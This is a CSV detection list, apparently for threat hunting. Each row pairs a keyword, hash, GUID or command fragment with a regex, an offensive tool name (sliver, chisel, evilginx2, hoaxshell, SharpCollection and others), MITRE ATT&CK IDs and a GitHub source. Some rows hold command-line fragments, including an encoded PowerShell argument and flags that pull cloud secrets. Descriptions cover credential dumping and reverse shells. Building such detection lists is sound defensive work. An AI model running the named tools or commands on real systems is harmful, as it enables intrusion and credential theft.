"*DumpShellcode\*",".{0,1000}DumpShellcode\\.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*DumpSMSAPassword*",".{0,1000}DumpSMSAPassword.{0,1000}","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer","T1003.001 - T1078 - T1558.002","TA0006 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","AD Enumeration","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*dumpVaultCredentials.py*",".{0,1000}dumpVaultCredentials\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*dumpXor.exe *",".{0,1000}dumpXor\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*Dynamically convert a native PE to PIC shellcode*",".{0,1000}Dynamically\sconvert\sa\snative\sPE\sto\sPIC\sshellcode.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*dynasty_rce/rce.php*",".{0,1000}dynasty_rce\/rce\.php.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*DynastyPersist-main.zip*",".{0,1000}DynastyPersist\-main\.zip.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*Dyn-NetClone|x64*",".{0,1000}Dyn\-NetClone\|x64.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*Dyn-PyClone|Win32*",".{0,1000}Dyn\-PyClone\|Win32.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*",".{0,1000}\-e\s\-\-enumerate\sgoogle.{0,1000}github.{0,1000}k8s\s\-\-github\-only\-org\s\-\-k8s\-get\-secret\-values\s\-\-gcp\-get\-secret\-values.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*",".{0,1000}\-e\sZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA\=.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*e022c33f7f02b564f42f4ae68edded719b3e4cfdb3ea9ce9de2d07dc1c586321*",".{0,1000}e022c33f7f02b564f42f4ae68edded719b3e4cfdb3ea9ce9de2d07dc1c586321.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e066fd26097862651947220c02240ca24faceb5f4ca0d1279881d97f7cff2c17*",".{0,1000}e066fd26097862651947220c02240ca24faceb5f4ca0d1279881d97f7cff2c17.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e0745223bdd96223cc512234545e517028d410e462bfa265f4c09b8e3740a44a*",".{0,1000}e0745223bdd96223cc512234545e517028d410e462bfa265f4c09b8e3740a44a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e075c5a3c998e450c06b2e27ac2904ac2377b6d724577c5071437b68d6b3238b*",".{0,1000}e075c5a3c998e450c06b2e27ac2904ac2377b6d724577c5071437b68d6b3238b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E08BAA9C-9D20-4C9A-8933-EC567F39F54C*",".{0,1000}E08BAA9C\-9D20\-4C9A\-8933\-EC567F39F54C.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*e094dc2a9ec5fe9800948a640f416fe610fdf155874e897d3cba6cc86f854083*",".{0,1000}e094dc2a9ec5fe9800948a640f416fe610fdf155874e897d3cba6cc86f854083.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*",".{0,1000}E09F4899\-D8B3\-4282\-9E3A\-B20EE9A3D463.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","0","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*e0b25ed05fbe4558e26b270038d41c1de91ecde35d03520a2f20aaab7eee37e3*",".{0,1000}e0b25ed05fbe4558e26b270038d41c1de91ecde35d03520a2f20aaab7eee37e3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e0bca03ae086a2ada8a29930036efe3ba12961a2ee71f2ec72cf9bd57096f604*",".{0,1000}e0bca03ae086a2ada8a29930036efe3ba12961a2ee71f2ec72cf9bd57096f604.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e0c20aa0ef6e4fd5cd5cabde2f89d64d4fe1c73d13cc1ed58e401bf5e0667754*",".{0,1000}e0c20aa0ef6e4fd5cd5cabde2f89d64d4fe1c73d13cc1ed58e401bf5e0667754.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e0cc8936e11dcf4e016ff32f5a81aa15f352cb71ec8a24b383dc263e56425018*",".{0,1000}e0cc8936e11dcf4e016ff32f5a81aa15f352cb71ec8a24b383dc263e56425018.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*e0dc49ab46ab388ae93213602843e135bae218d15f17fc74bdc56de38fe5d6cc*",".{0,1000}e0dc49ab46ab388ae93213602843e135bae218d15f17fc74bdc56de38fe5d6cc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e114380d61281bb9bffe5246d366342cecc6dfa22814b308fa08b075e0b0f35f*",".{0,1000}e114380d61281bb9bffe5246d366342cecc6dfa22814b308fa08b075e0b0f35f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E11DC25D-E96D-495D-8968-1BA09C95B673*",".{0,1000}E11DC25D\-E96D\-495D\-8968\-1BA09C95B673.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","0","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*e12b5b70989233ee34a1984b959ac4e42a282148cc0f6f8a5434f2a1502e3fdd*",".{0,1000}e12b5b70989233ee34a1984b959ac4e42a282148cc0f6f8a5434f2a1502e3fdd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e1641d2918f41349e233feffd77b4f5088e4bc250d30a7be67693f3a09025088*",".{0,1000}e1641d2918f41349e233feffd77b4f5088e4bc250d30a7be67693f3a09025088.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*E17B7339-C788-4DBE-B382-3AEDB024073D*",".{0,1000}E17B7339\-C788\-4DBE\-B382\-3AEDB024073D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*e1a068365245f8a021fca5f8b40a2cc5aedd235015c39db6697b7d3ba05cd996*",".{0,1000}e1a068365245f8a021fca5f8b40a2cc5aedd235015c39db6697b7d3ba05cd996.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e1a5b167ec626fd934b6abac47d82987ba3313d505c1b3487072cca8ca9c4e65*",".{0,1000}e1a5b167ec626fd934b6abac47d82987ba3313d505c1b3487072cca8ca9c4e65.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e1aa34410dd260529c0e32bb0fbc5263f3042bf47d01dc5ad424bb8cecc2b887*",".{0,1000}e1aa34410dd260529c0e32bb0fbc5263f3042bf47d01dc5ad424bb8cecc2b887.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e1b23e90752a40a4a54afc406b874655f6d279a26e140402ad3f69509e9da496*",".{0,1000}e1b23e90752a40a4a54afc406b874655f6d279a26e140402ad3f69509e9da496.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e1cd2b55-3b4f-41bd-a168-40db41e34349*",".{0,1000}e1cd2b55\-3b4f\-41bd\-a168\-40db41e34349.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*e1ed358b0e31199ca8ae3cc4307183d3131c27cef32c610bcc955a03527057bb*",".{0,1000}e1ed358b0e31199ca8ae3cc4307183d3131c27cef32c610bcc955a03527057bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e21abc2c59ac704df355a42b7275021e48670c876d019f05f56bf5a9c4cff78c*",".{0,1000}e21abc2c59ac704df355a42b7275021e48670c876d019f05f56bf5a9c4cff78c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e230c0ac37691456fdf0363b1f81215c15a7a235ddc96f072c74c5ac40866c9e*",".{0,1000}e230c0ac37691456fdf0363b1f81215c15a7a235ddc96f072c74c5ac40866c9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e237f1a9a8fc58940811f2ea1eb987242718290c588fb36c29741176700980bb*",".{0,1000}e237f1a9a8fc58940811f2ea1eb987242718290c588fb36c29741176700980bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e23efc384f4295bb8fbf5b0e6f2f3539f6ff45fbc2ef8ce2bb54aefebaa069e3*",".{0,1000}e23efc384f4295bb8fbf5b0e6f2f3539f6ff45fbc2ef8ce2bb54aefebaa069e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e273485e4f1382b7848b6c263cf0ce9e37aa783e9e781630aaa50daffea5aeb2*",".{0,1000}e273485e4f1382b7848b6c263cf0ce9e37aa783e9e781630aaa50daffea5aeb2.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*e277468009b97989146089c83231fa03247555b6cc2979b68d549a0d0e8ea0e1*",".{0,1000}e277468009b97989146089c83231fa03247555b6cc2979b68d549a0d0e8ea0e1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*e27f5050d889525c51431074c81403d6917f081af8694a978e92a975a5b67472*",".{0,1000}e27f5050d889525c51431074c81403d6917f081af8694a978e92a975a5b67472.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e281c4aeeb508f9ec7abdaedde54203747ef31b02b97aa21ea7a2c4c06659f11*",".{0,1000}e281c4aeeb508f9ec7abdaedde54203747ef31b02b97aa21ea7a2c4c06659f11.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e2940f2785f9f9b38e5cac80100a401145f558602a7af45475760884aeba44f9*",".{0,1000}e2940f2785f9f9b38e5cac80100a401145f558602a7af45475760884aeba44f9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*e2964ea4bc4e439e55f46ed309904e9592145858076d65363a2bbbab0bd608cc*",".{0,1000}e2964ea4bc4e439e55f46ed309904e9592145858076d65363a2bbbab0bd608cc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" 